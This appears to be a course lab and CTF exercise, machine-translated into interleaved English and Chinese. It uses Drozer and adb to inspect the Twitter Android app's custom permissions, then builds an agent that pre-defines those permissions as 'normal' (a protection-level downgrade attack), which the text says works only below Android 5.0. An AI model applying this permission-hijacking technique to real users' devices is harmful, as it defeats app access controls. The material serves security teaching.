M 502: Protection Level Downgrade (30 pts) M 502:保护等级降级(30分)

What You Need for This Project你需要什么这个项目

Purpose目的

To practice using Drozer to examine Android internals.练习使用Drozer来检查Android内部。 The attack will fail unless you have a really old version of Android, below 5.0, which is unlikely.攻击将失败,除非你有一个非常旧版本的Android,低于5.0,这是不太可能的。

Connecting with ADB与ADB连接

On Kali, in a Terminal, execute this command:在Kali上,在终端中执行以下命令: 
ip addr ip addr
Find your IP address, as highlighted in the image below.找到您的IP地址,如下图所示。

To find your Android device, execute this command, replacing the IP address with the IP address you found above, including the CIDR suffix "/24".要查找您的Android设备,请执行此命令,将IP地址替换为您在上面找到的IP地址,包括CIDR后缀“/ 24”。 

netdiscover -r 172.16.123.155/24 netdiscover -r 172.16.123.155/24
Netdiscover finds the devices on your network. Netdiscover会在您的网络上找到这些设备。 Find the one that is not from "VMware", as highlighted in the image below.找到不属于“VMware”的那个,如下图所示。

Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined in the previous step.执行此命令以连接到您的Android设备,将IP地址替换为您在上一步中确定的设备的IP地址。 

adb connect 172.16.123.171 adb connect 172.16.123.171
Adb connects, as shown below. Adb连接,如下所示。

Launching the Drozer Agent启动Drozer代理

On your Android emulator, launch the Drozer agent and make sure the Server is running, as shown below.在Android模拟器上,启动Drozer代理并确保服务器正在运行,如下所示。

If you don't have a Drozer agent on your emulator, execute these commands to install one:如果您的模拟器上没有Drozer代理,请执行以下命令安装一个: 

wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk adb install drozer-agent-2.3.4.apk

Port Forwarding转发端口

On Kali, execute this command to expose the agent's port.在Kali上,执行此命令以公开代理程序的端口。 
adb forward tcp:31415 tcp:31415 adb forward tcp:31415 tcp:31415
The command completes without errors, as shown below.该命令完成且没有错误,如下所示。

Installing the Twitter App安装Twitter应用程序

On your Android emulator, install Twitter from the App store, as shown below.在Android模拟器上,从App Store安装Twitter,如下所示。

Viewing Twitter App Permissions查看Twitter应用程序权限

In Kali, in a Terminal, at the # bash prompt, execute these commands:在Kali中,在终端中,在#bash提示符下,执行以下命令: 
drozer console connect drozer控制台连接
run app.package.info -a com.twitter.android运行app.package.info -a com.twitter.android
Information about the app appears, starting with general information as shown below.显示有关该应用程序的信息,从一般信息开始,如下所示。

At the end, there are three permissions the Twitter app defines, as shown below:最后,Twitter应用程序定义了三个权限,如下所示:

I was unable to find out what "READ_DATA" does in detail, but we can learn more about the other two permissions.我无法详细了解“READ_DATA”的内容,但我们可以了解有关其他两个权限的更多信息。

To see the appm components, execute this command:要查看appm组件,请执行以下命令: 

run app.package.attacksurface com.twitter.android运行app.package.attacksurface com.twitter.android
Twitter uses several activities , " broadcast receivers ", and services , but no "content providers", as shown below. Twitter使用了几种活动 ,“ 广播接收者 ”和服务 ,但没有“内容提供者”,如下所示。

Understanding the AUTH_APP Permission了解AUTH_APP权限

To see more about the activities , execute this command:要查看有关活动的更多信息,请执行以下命令: 
run app.activity.info -a com.twitter.android运行app.activity.info -a com.twitter.android
We see that the AUTH_APP permission controls access to the AuthorizeAppActivity activity, as shown below.我们看到AUTH_APP权限控制对AuthorizeAppActivity活动的访问,如下所示。

Understanding the RESTRICTED Permission了解RESTRICTED权限

To see more about the broadcast receivers , execute this command:要查看有关广播接收器的更多信息,请执行以下命令: 
run app.broadcast.info -a com.twitter.android运行app.broadcast.info -a com.twitter.android
We see that the RESTRICTED permission controls access to the AppBroadcastReceiver receiver, as shown below.我们看到RESTRICTED权限控制对AppBroadcastReceiver接收器的访问,如下所示。

Viewing the Protection Levels查看保护级别

To see the protection levels of these permissions, execute these commands:要查看这些权限的保护级别,请执行以下命令: 
run information.permissions --permission com.twitter.android.permission.READ_DATA运行information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED运行information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP运行information.permissions --permission com.twitter.android.permission.AUTH_APP
exit出口
As shown below, READ_DATA and RESTRICTED have the signature protection level, and AUTH_APP is marked as dangerous .如下所示, READ_DATARESTRICTED具有签名保护级别, AUTH_APP被标记为危险

The signature -level permissions are only available to apps signed with the same certificate, and the dangerous permission will pop a box up, requesting permission from the user. 签名级别权限仅适用于使用相同证书签名的应用程序, 危险权限将弹出一个框,请求用户许可。

Downgrading Java降级Java

Drozer can't sign apps with recent Java versions, so we need to downgrade Java. Drozer无法使用最新的Java版本签署应用程序,因此我们需要降级Java。

Execute these commands to do that.执行这些命令来执行此操作。 

apt update apt更新
apt install openjdk-8-jdk -y apt install openjdk-8-jdk -y
If an "Outdated processor microcode" box appears, press Enter .如果出现“过时的处理器微码”框,请按Enter键

Execute this command to reboot Kali.执行此命令以重新启动Kali。 

reboot重启
Execute this command to select the default version of javac, the Java compiler:执行此命令以选择javac的默认版本,即Java编译器: 
update-alternatives --config javac update-alternatives --config javac
Find "java-8" on the list and select it.在列表中找到“java-8”并选择它。 When I did it, that was item 2 as shown below.当我这样做时,那是第2项,如下所示。

Execute this command to select the default version of java:执行此命令以选择java的默认版本: 

update-alternatives --config java update-alternatives --config java
Find "java-8" on the list and select it.在列表中找到“java-8”并选择它。 When I did it, that was item 2 as shown below.当我这样做时,那是第2项,如下所示。

Building a Drozer App建立一个Drozer应用程序

To build a Drozer app that requests the permissions defined by Twitter, in Kali, in a Terminal, at the # bash prompt, execute this command:要构建一个Drozer应用程序,请求Twitter,Kali,终端,#bash提示符中定义的权限,执行以下命令: 
drozer agent build --permission \ drozer agent build --permission \
com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory.构建代理并将其放在/ tmp目录中。 Note the path to the agent, highlighted in the image below.请注意代理的路径,如下图所示。

Reconnecting with ADB与ADB重新连接

Execute this command to connect to your Android device, replacing the IP address with the IP address of the device you determined previously.执行此命令以连接到您的Android设备,将IP地址替换为您之前确定的设备的IP地址。 
adb connect 172.16.123.171 adb connect 172.16.123.171
Adb connects, as shown below. Adb连接,如下所示。

Monitoring the Log监控日志

Execute these commands to clear old log entries and monitor the Android log:执行以下命令清除旧日志条目并监控Android日志: 
adb logcat -c adb logcat -c
adb logcat | adb logcat | grep perm grep烫发
Leave this window running, as shown below.保持此窗口运行,如下所示。

Installing the Agent安装代理

On Kali, open a second Terminal window.在Kali上,打开第二个终端窗口。 Execute these commands to remove the old agent and install the new one.执行这些命令以删除旧代理并安装新代理。

In the second command, adjusting the path to lead to the APK file you built previously with Drozer.在第二个命令中,调整路径以指向您之前使用Drozer构建的APK文件。 

adb uninstall com.mwr.dz adb uninstall com.mwr.dz
adb install /tmp/tmpzXbifs/agent.apk adb install /tmp/tmpzXbifs/agent.apk
The agent installs, as shown in the upper window in the image below.代理程序将安装,如下图中的上部窗口所示。

The log shows that the app was not granted these two permissions:日志显示应用程序未被授予以下两个权限:

as shown in the lower window in the image below.如下图所示,如下图所示。

This makes sense, because those are signature -level permissions, and the Drozer agent is not signed with the Twitter certificate.这是有道理的,因为这些是签名级别权限,并且Drozer代理未使用Twitter证书签名。

Uninstalling Twitter and the Drozer Agent卸载Twitter和Drozer代理

On Kali, execute these commands:在Kali上,执行以下命令: 
adb uninstall com.mwr.dz adb uninstall com.mwr.dz
adb uninstall com.twitter.android adb uninstall com.twitter.android
The operations succeed, as shown below.操作成功,如下所示。

Building a Drozer Agent that Defines Twitter Permissions构建定义Twitter权限的Drozer代理

In Kali, in a Terminal, at the # bash prompt, execute this command:在Kali中,在终端中,在#bash提示符下,执行以下命令: 
drozer agent build --define-permission \ drozer agent build --define-permission \
com.twitter.android.permission.READ_DATA normal \ com.twitter.android.permission.READ_DATA正常\
com.twitter.android.permission.RESTRICTED normal \ com.twitter.android.permission.RESTRICTED正常\
com.twitter.android.permission.AUTH_APP normal --permission \ com.twitter.android.permission.AUTH_APP正常 - 允许\
com.twitter.android.permission.READ_DATA \ com.twitter.android.permission.READ_DATA \
com.twitter.android.permission.RESTRICTED \ com.twitter.android.permission.RESTRICTED \
com.twitter.android.permission.AUTH_APP com.twitter.android.permission.AUTH_APP
The agent is built and placed in the /tmp directory.构建代理并将其放在/ tmp目录中。 Note the path to the agent, highlighted in the image below.请注意代理的路径,如下图所示。

Installing the New Agent安装新代理

On Kali, open a second Terminal window.在Kali上,打开第二个终端窗口。 Execute these commands to remove the old agent and install the new one.执行这些命令以删除旧代理并安装新代理。

In the second command, adjusting the path to lead to the APK file you built previously with Drozer.在第二个命令中,调整路径以指向您之前使用Drozer构建的APK文件。 

adb install /tmp/tmp_URMcR/agent.apk adb install /tmp/tmp_URMcR/agent.apk
The agent installs, as shown below.代理程序安装,如下所示。

Installing the Twitter App Again再次安装Twitter应用程序

On your Android emulator, install Twitter from the App store again, as shown below.在Android模拟器上,再次从App Store安装Twitter,如下所示。

If you are using Android 5.0 or above, the installation should fail with the error message shown below.如果您使用的是Android 5.0或更高版本,则安装失败,并显示如下所示的错误消息。

M 502a: Recording Your Success (15 pts) M 502a:记录你的成功(15分)

Find the text covered by a green box in the image above.找到上图中绿框所覆盖的文字。 That's the flag.那是旗帜。

Extra Credit: Use Android 4.3 (15 pts)额外信用:使用Android 4.3(15分)

Install an Android 4.3 emulator.安装Android 4.3模拟器。

I used the one shown below.我使用下面显示的那个。

You can't use the Gapps button to install Google Play.您无法使用Gapps按钮安装Google Play。 Instead, you need to install these two components one by one, rebooting after each installation.相反,您需要逐个安装这两个组件,每次安装后重新启动。

https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip https://samsclass.info/128/proj/Genymotion-ARM-Translation_v1.1.zip

https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip https://samsclass.info/128/proj/gapps-jb-20130813-signed.zip

Then repeat the project.然后重复该项目。 This time Twitter will install.这次Twitter将安装。

Launch the Drozer agent, configure port forwarding, and execute these commands to see Twitter's protection levels:启动Drozer代理,配置端口转发,并执行这些命令以查看Twitter的保护级别: 

drozer console connect drozer控制台连接
run information.permissions --permission com.twitter.android.permission.READ_DATA运行information.permissions --permission com.twitter.android.permission.READ_DATA
run information.permissions --permission com.twitter.android.permission.RESTRICTED运行information.permissions --permission com.twitter.android.permission.RESTRICTED
run information.permissions --permission com.twitter.android.permission.AUTH_APP运行information.permissions --permission com.twitter.android.permission.AUTH_APP
exit出口
The permissions are all normal , as shown below.权限都正常 ,如下所示。

M 502b: Recording Your Success (15 pts) M 502b:记录你的成功(15分)

Find the text covered by a green box in the image above.找到上图中绿框所覆盖的文字。 That's the flag.那是旗帜。

References参考

drozer build agent # On recent Kali drozer build agent#最近Kali
How to downgrade java on ubuntu/kali linux 如何在ubuntu / kali linux上降级java
Posted 2-8-19 by Sam Bowne Sam Bowne发表于2-8-19
Changed to a CTF 3-1-19改为CTF 3-1-19